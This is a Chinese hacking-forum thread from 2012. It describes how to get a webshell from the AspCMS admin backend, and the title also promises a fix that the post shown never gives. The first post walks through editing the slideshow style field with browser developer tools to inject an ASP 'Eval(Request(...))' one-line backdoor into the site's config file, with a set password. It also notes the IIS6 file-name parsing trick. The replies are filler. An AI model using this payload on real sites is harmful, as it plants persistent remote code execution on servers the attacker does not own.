查看: 3853|回复: 25

aspcms后台拿shell漏洞(非添加模块)及修复方法

[复制链接]
发表于 2012-11-10 02:35:16 | 显示全部楼层 |阅读模式
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”

2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

3、一句话木马,密码a。在/config/AspCms_Config.asp
发表于 2012-11-14 01:05:38 | 显示全部楼层
我不是你想象中的那样完美那样坚强,金钱和美女就足以把我征服!  
发表于 2012-11-15 14:39:06 | 显示全部楼层
帮你项项吧  
发表于 2012-11-16 08:43:45 | 显示全部楼层
一个子 没看懂  
发表于 2012-11-17 22:57:59 | 显示全部楼层
不错,看看。  
发表于 2012-11-20 09:59:45 | 显示全部楼层
好 好帖 很好帖 确实好帖 少见的好帖  
发表于 2012-11-20 23:53:14 | 显示全部楼层
真好。。。。。。。。。  
发表于 2012-11-22 03:03:19 | 显示全部楼层
好困啊  
发表于 2012-11-23 13:20:44 | 显示全部楼层
呵呵 大家好奇嘛 来观看下~~~~  
发表于 2015-2-27 17:52:55 | 显示全部楼层
这个贴不错!!!!!  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则